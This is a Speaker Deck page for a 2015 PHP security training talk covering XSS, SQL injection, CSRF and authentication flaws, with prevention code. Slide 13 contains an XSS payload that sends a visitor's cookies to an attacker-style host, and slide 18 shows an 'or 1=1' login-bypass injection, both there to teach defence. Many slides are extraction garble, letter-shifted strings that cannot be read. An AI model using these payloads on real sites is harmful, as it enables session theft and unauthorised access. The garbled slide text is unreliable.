Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Secure PHP Bootcamp

Avatar for Chris Cornutt Chris Cornutt
January 23, 2015
Technology
0
680

Secure PHP Bootcamp

Given at PHP Benelux 2015

Avatar for Chris Cornutt

Chris Cornutt

January 23, 2015
Tweet

More Decks by Chris Cornutt

See All by Chris Cornutt
Securing Legacy Applications
Avatar for Chris Cornutt ccornutt
0
160
Pentesting for Developers
Avatar for Chris Cornutt ccornutt
0
160
Securing Legacy Applications - Longhorn PHP 2018
Avatar for Chris Cornutt ccornutt
1
210
Pieces of Auth
Avatar for Chris Cornutt ccornutt
0
360
Securing Legacy Applications
Avatar for Chris Cornutt ccornutt
0
540
Build Security In
Avatar for Chris Cornutt ccornutt
0
240
Introduction to Slim 3
Avatar for Chris Cornutt ccornutt
0
180
Securing Legacy Applications
Avatar for Chris Cornutt ccornutt
0
32
PHP Security, Redfined
Avatar for Chris Cornutt ccornutt
0
300

Other Decks in Technology

See All in Technology
品質保証の取り組みを広げる仕組みづくり〜スキルの移譲と自律を支える実践知〜
Avatar for tarappo tarappo
2
840
決済システムの信頼性を支える技術と運用の実践
Avatar for ykagano ykagano
0
460
旧から新へ: 大規模ウェブクローラの Perl から Go への移行 / YAPC::Fukuoka 2025
Avatar for motemen motemen
1
580
Black Hat USA 2025 Recap ~ クラウドセキュリティ編 ~
Avatar for Kyohei Mizumoto kyohmizu
0
510
re:Invent完全攻略ガイド
Avatar for JunjiKoide junjikoide
1
260
Pythonで構築する全国市町村ナレッジグラフ: GraphRAGを用いた意味的地域検索への応用
Avatar for negi111111 negi111111
8
3.4k
Flutterコントリビューションのススメ
Avatar for Koji Wakamiya d_r_1009
1
340
us-east-1 の障害が 起きると なぜ ソワソワするのか
Avatar for Kazuki Miura miu_crescent
PRO
2
770
AIエージェントは「使う」だけじゃなくて「作る」時代! 〜最新フレームワークで楽しく開発入門しよう〜
Avatar for みのるん minorun365
10
1.6k
Post-AIコーディング時代のエンジニア生存戦略
Avatar for shinoyu shinoyu
0
250
QAエンジニアがプロダクト専任で チームの中に入ると。。。?/登壇資料(杉森 太樹)
Avatar for Hacobu hacobu
PRO
0
180
機密情報の漏洩を防げ! Webフロントエンド開発で意識すべき漏洩パターンとその対策
Avatar for mizdra mizdra
PRO
3
410

Featured

See All Featured
XXLCSS - How to scale CSS and keep your sanity
Avatar for Zaharenia Atzitzikaki sugarenia
249
1.3M
ReactJS: Keep Simple. Everything can be a component!
Avatar for Pedro Nauck pedronauck
666
130k
Code Review Best Practice
Avatar for Trisha Gee trishagee
72
19k
Stop Working from a Prison Cell
Avatar for Chris Michel hatefulcrawdad
272
21k
Speed Design
Avatar for Sergey Chernyshev sergeychernyshev
32
1.2k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
Avatar for Tammy Everts tammyeverts
55
3.1k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
Avatar for Stéphanie Walter stephaniewalter
285
14k
Code Reviewing Like a Champion
Avatar for maltzj maltzj
527
40k
[RailsConf 2023] Rails as a piece of cake
Avatar for Vladimir Dementyev palkan
57
6k
Making the Leap to Tech Lead
Avatar for Ryan Cromwell cromwellryan
135
9.6k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
Avatar for Marc Duiker marcduiker
34
2.3k
Navigating Team Friction
Avatar for Lara Hogan lara
190
15k

Transcript

  1. Secure PHP Development $ISJT$PSOVUU!FOZHNB

  2. https://jetbrains.com

  3. Goals #BTJDBQQTFDQSJODJQMFT 7VMOFSBCJMJUJFT&YQMPJUT )BOETPOFYQFSJFODF 5PPMT5FDIOJRVFT

  4. 1)1%FW :FBST "QQTFDGPDVTFE IUUQXFCTFDJP IUUQTFDVSJOHQIQDPN

  5. IUUQCJUMZPXBTQUPQ

  6. 5IFSF`T OPTVDIUIJOH BTTFDVSF

  7. IUUQTHJUIVCDPNQTFDJPOPUDI /PUDI"7VMOFSBCMF"QQMJDBUJPO

  8. IUUQTHJUIVCDPNQTFDJPOPUDI 4FUVQ5JNF PSIUUQOPUDITFDVSJOHQIQDPN

  9. None

  10. XSS: Cross Site Scripting

  11. *OKFDUJPOPGDPOUFOUJOUPUIFQBHF VTVBMMZ+BWBTDSJQU SFqFDUFEWTTUPSFE QPPSPVUQVUFTDBQJOH

  12. Example <?php echo “Howdy, my name is “.$_GET[‘name’]; ?> ?name=<script>alert(“xss”)</script>

  13. Example <script> xmlhttp = new XMLHttpRequest(); xmlhttp.open( 'GET', ‘http://leethack.php?cookies=‘+document.cookie, true);

    xmlhttp.send(); </script> "TTVNFTDSPTTPSJHJOQPMJDZPG

  14. Prevention #1 <?php $name = htmlspecialchars( $_GET[‘name’], ENT_COMPAT, ‘UTF-8’ );

    echo “Howdy, my name is “.$name; ?> /PUF5IJTJTPOMZGPSB)5.-DPOUFYU

  15. Prevention #2 {{ name|e(‘html’) }} {{ name|e(‘html_attr’) }} {{ name|e(‘js’)

    }} {{ name|e(‘css’) }} /PUF5IJTFYBNQMFSFRVJSFT5XJH

  16. SQLi: SQL Injection

  17. *OKFDUJPOTQFDJpDUP42-TUBUFNFOUT FYQPTFEBUB CZQBTTBVUI NFDIBOJTNT QPPSJOQVUpMUFSJOH

  18. Example $sql = ‘select id from users where username =

    “‘.$_POST[‘username’].’” and password = “‘.$_POST[‘password’].’”’; password=‘ or 1=1; # select id from users where username = “user1” and password = “” or 1=1; #

  19. BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH

  20. BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH X

  21. Prevention <?php $stmt = $dbh->prepare(‘select id from users’ .’ where

    username = :user’ .’ and password = :pass’); $stmt->execute(array( ‘user’ => $_POST[‘username’], ‘pass’ => $_POST[‘password’] )); $results = $stmt->fetchAll(PDO::FETCH_ASSOC); ?> /PUF5IJTFYBNQMFSFRVJSFT1%0TVQQPSU

  22. CSRF: Cross Site Request Forgery

  23. VOWBMJEBUFEGPSNTVCNJTTJPO POBMMTUBUFDIBOHFT XIBU`TUIFTPVSDF  TJNQMF SBOEPNJ[FE GPSFBDIGPSN

  24. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> </form>

  25. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> <input type=“hidden” value=“098f6bcd4621d373cade4e832627b4f6” name=“csrf-token”/> </form>

  26. Auth*: Authentication & Authorization

  27. EJSFDUPCKFDUSFGFSFODF "  EBUBBDDFTT EBOHFSPVTBDUJPOT QPPSVTFSNBOBHFNFOU

  28. QMBJOUFYUQBTTXPSET OPQBTTXPSEQPMJDZ PWFSMZDPNQMFYQBTTXPSET QBTTXPSEIJOUT

  29. None
  30. None

  31. And…

  32. 4FDVSJUZ.JTDPOpHVSBUJPO 4FOTJUJWF%BUB&YQPTVSF $PNQPOFOUTXJUI,OPXO7VMOFSBCJMJUJFT 6OWBMJEBUFE3FEJSFDUTBOE'PSXBSET

  33. 5IBU`TBMMGPMLT !FOZHNB !TFDVSJOHQIQ IUUQTFDVSJOHQIQDPN